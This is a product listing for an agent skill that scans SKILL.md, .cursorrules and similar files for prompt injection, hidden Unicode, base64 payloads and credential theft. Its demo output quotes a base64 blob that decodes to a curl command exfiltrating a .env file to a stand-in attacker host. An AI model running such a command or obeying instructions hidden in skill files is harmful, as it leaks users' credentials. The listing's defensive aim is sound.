Works with the AI tools you already use
audit agent skill
by Jose Luis
A security auditor that detects malicious instructions, credential theft, and hidden payloads in agent skills.
Secure checkout via Stripe
See it in action
You say
Can you audit this SKILL.md I found on GitHub before I add it to my project? [pasted content with a suspicious hidden base64 string]
Your agent does
VERDICT: DANGEROUS
Critical: 2 High: 0 Medium: 1
CRITICAL FINDINGS [line 12] Encoded payloads "base64: Y3VybCAtWCBQT1NUIGh0dHBzOi8vYmFkLWFjdG9yLmV4cGxvcmUvIC1kIEAoZ3Jl..." This payload decodes to a curl command that exfiltrates your local .env file.
WHAT THIS SKILL WOULD DO It hides a data theft script inside a legitimate-looking "formatter" utility.
RECOMMENDATION Do not install. This is a targeted credential stealer.
What you get
About this skill
The problem
Skill files and context documents are not just documentation. They are text instructions that an agent obeys, making it trivial for attackers to hide malicious commands, credential thieves, or remote execution payloads in plain sight.
What it does
- Scans for hidden Unicode characters, Base64 payloads, and scanner-evasion tricks like invisible text.
- Identifies instruction overrides that attempt to silence safety filters or hide agent activity from you.
- Detects unauthorized access to secrets like API keys, SSH credentials, and environment variables.
- Flags dangerous shell commands, remote downloads, and data exfiltration patterns to unknown webhooks.
- Verifies that declared behavior in the skill metadata matches the actual instructions.
Why this beats prompting it yourself
Standard agents are prone to prompt injection and may accidentally follow the hostile instructions they are meant to audit. This skill treats the input strictly as data, uses a specific 10-point threat model, and decodes obfuscated payloads instead of ignoring them.
Use cases
- Vetting a third-party SKILL.md or MCP server from GitHub before installation.
- Auditing .cursorrules or CLAUDE.md files in a shared or public repository.
- Checking suspicious Base64 blobs found within agent configuration files.
- Verifying that your own developed skills don't leak environment variables.
Known limitations
A clean scan is not a guarantee of safety as new evasion techniques evolve. It cannot verify the runtime behavior of external binaries downloaded by a skill.
How to install
Drop the file into your AI Agent. Works with Claude, Cursor, ChatGPT, and 20+ more.
Reviews
No reviews yet
Be one of the first to try it. Every listed skill passes our trust checks below.
Security scanned
Passed our 8-point scan before listing
Fresh listing
Recently published to Agensi
30-day refund
Not a fit? Get your money back
Trust & safety
Security scanned
Verified clean today
- 30-day refund guarantee
- One-time purchase, yours forever
- Secure checkout via Stripe
Frequently Asked Questions
Popular in AI Agents & LLM Ops
designing-hybrid-context-layers
Architects the right retrieval strategy for every query — teaching your agent when to use RAG, a knowledge graph, or a temporal index instead of defaulting to vector search for everything.

prompt-engineer
Professional prompt engineering patterns for building robust, secure, and production-ready LLM applications.
codex-grade-coding
Turn your AI agent into a senior engineer with strict task classification and verification-driven coding protocols.
deep-research-team
Deploy a hierarchical team of AI agents to perform 15-30 minute deep-dive research with parallel execution.